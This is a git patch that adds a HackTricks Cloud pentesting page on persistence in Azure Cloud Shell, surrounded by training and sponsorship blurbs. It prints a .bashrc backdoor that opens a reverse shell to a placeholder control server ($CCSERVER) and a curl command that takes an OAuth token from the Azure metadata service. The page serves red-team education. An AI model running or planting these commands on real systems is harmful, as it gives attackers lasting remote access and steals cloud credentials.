From a027dd2a21556fad8eec3f2abfcdbc37a27566b0 Mon Sep 17 00:00:00 2001
From: Jaime Polop <117489620+JaimePolop@users.noreply.github.com>
Date: Fri, 17 Jan 2025 17:39:20 +0100
Subject: [PATCH] Add files via upload
---
.../az-cloud-shell-persistence.md | 56 +++++++++++++++++++
1 file changed, 56 insertions(+)
create mode 100644 src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
new file mode 100644
index 000000000..7e6749b1d
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
@@ -0,0 +1,56 @@
+# Az - Cloud Shell Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking: (1) (1) (1).png)
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking:  (1).png)
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
+
+## Cloud Shell Persistence
+
+Azure Cloud Shell offers command-line access to manage Azure resources with persistent storage and automatic authentication. Attackers can exploit this by placing backdoors in the persistent home directory:
+
+* **Persistent Storage**: Azure Cloud Shell’s home directory is mounted on an Azure file share and remains intact even after the session ends.
+* **Startup Scripts**: Files like .bashrc execute automatically at the start of each session, allowing for persistent execution when the cloud shell starts.
+
+Example backdoor in .bashrc:
+
+{% code overflow="wrap" %}
+```bash
+echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc
+```
+{% endcode %}
+
+This backdoor can execute commands even 5 minutes after the cloud shell is finished by the user.
+
+Additionally query Azure’s metadata service for instance details and tokens:
+{% code overflow="wrap" %}
+```bash
+curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s
+```
+{% endcode %}
+
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}